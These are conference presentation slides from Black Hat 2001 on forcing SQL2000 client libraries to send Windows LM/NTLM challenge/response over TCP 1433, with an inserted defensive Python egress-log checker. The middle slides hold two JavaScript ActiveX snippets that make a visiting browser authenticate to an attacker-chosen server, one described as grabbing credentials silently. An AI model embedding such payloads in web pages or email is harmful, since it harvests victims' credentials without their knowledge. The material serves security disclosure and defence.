Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Timothy M. Mullen AnchorIS.Com, Inc.

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

The Culprit:SQL2000 Super Sockets Lib

  • New functions in dbnetlib.dll!

  • Supports TCP/IP Sockets, encryption, authentication, etc.

  • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)

Backgrounders…

  • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)

  • Integrated Authentication (NTLM Creds) needed Named Pipes

  • Named Pipes required 139/445 open to authenticating system.

Backgrounders… cont.

  • Integrated Authentication has _always_ been the recommended configuration.

  • 139/445 has long been blocked at the router (if not, you are a yum-yum.)

  • Many server-to-server apps authenticate over TCP 1433 because it is “safe” .

The Skinny

  • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.

  • The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports, if changed)

The Problem

  • Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.

  • Many have 1433 explicitly open for application support, server-to-server queries, etc.
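
An added example, not part of the talk: a small check a defender can run over firewall egress logs to find workstations that were allowed out to external hosts on the ports that carry LM/NTLM challenge/response, i.e. 139/445 and the 1433 back channel described above. The key=value log format and the sample lines are constructed for this example; internal-to-internal traffic on those ports is expected and is not reported.

```python
import ipaddress
import re

# Constructed sample egress log lines (not from the talk), in a key=value
# syslog style assumed for this example; "action" is the firewall verdict.
SAMPLE_LOG = """\
action=allow proto=tcp src=10.1.2.3 dst=10.1.1.1 dport=1433
action=allow proto=tcp src=10.1.2.3 dst=203.0.113.7 dport=1433
action=deny proto=tcp src=10.1.2.3 dst=203.0.113.7 dport=445
action=allow proto=tcp src=10.1.2.9 dst=198.51.100.20 dport=445
action=allow proto=tcp src=10.1.2.9 dst=198.51.100.20 dport=443
"""

# Ports on which a Windows client will complete LM/NTLM challenge/response:
# SMB (139/445), and, as the talk shows, SQL over dbnetlib (1433 by default).
NTLM_PORTS = {139: "netbios-ssn", 445: "smb", 1433: "mssql/dbnetlib"}
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)

def parse_line(line):
    """Turn one key=value log line into a dict; None if required fields are missing."""
    fields = dict(FIELD_RE.findall(line))
    if not {"action", "src", "dst", "dport"} <= set(fields):
        return None
    fields["dport"] = int(fields["dport"])
    return fields

def find_ntlm_egress(log_text):
    """Return (src, dst, port, service) for each allowed connection from an
    internal host to an external host on a port that carries NTLM auth."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["action"] != "allow" or rec["dport"] not in NTLM_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            findings.append((rec["src"], rec["dst"], rec["dport"], NTLM_PORTS[rec["dport"]]))
    return findings

if __name__ == "__main__":
    for src, dst, port, svc in find_ntlm_egress(SAMPLE_LOG):
        print(f"{src} -> {dst}:{port} ({svc}) allowed outbound: creds can leave here")
```

Two of the five constructed lines are reported: the workstation reaching an external host on 1433, and the one reaching an external host on 445; the denied 445 attempt and the internal 1433 query are not.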

The Sting

  • Client side ODBC connections can specify the target server, authentication type, and the library to use.

  • Web sites can request that the client perform ADODB recordset requests, as well as other tasks.

  • HTML email as well.

Somewhat Lame Example

  • Web site with the following tag:

    {
    // Integrated Security=SSPI asks for NTLM creds; Network Library=dbnetlib
    // sends that exchange over the TCP socket (1433) instead of Named Pipes.
    conn = new ActiveXObject("ADODB.Connection");
    conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
    conn.Open();
    }

Example Cont…

  • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.

  • Easily engineered around…

Not So Lame Example

  • Let's try this one:

    {
    // SQLNamespace is marked safe for scripting, so no cross-domain
    // data-access prompt; Trusted_Connection=Yes again means NTLM over 1433.
    ns = new ActiveXObject("SQLNS.SQLNamespace");
    ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
    }

What’s the difference?

  • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !

  • Silently grab the creds for fun and profit!

Live Demo

  • Don’t try this at home! Professional driver on closed course.


Thanks!

AnchorIS.Com www.anchoris.com

HammerofGod www.hammerofgod.com

Timothy M. Mullen [email protected]

[email protected]
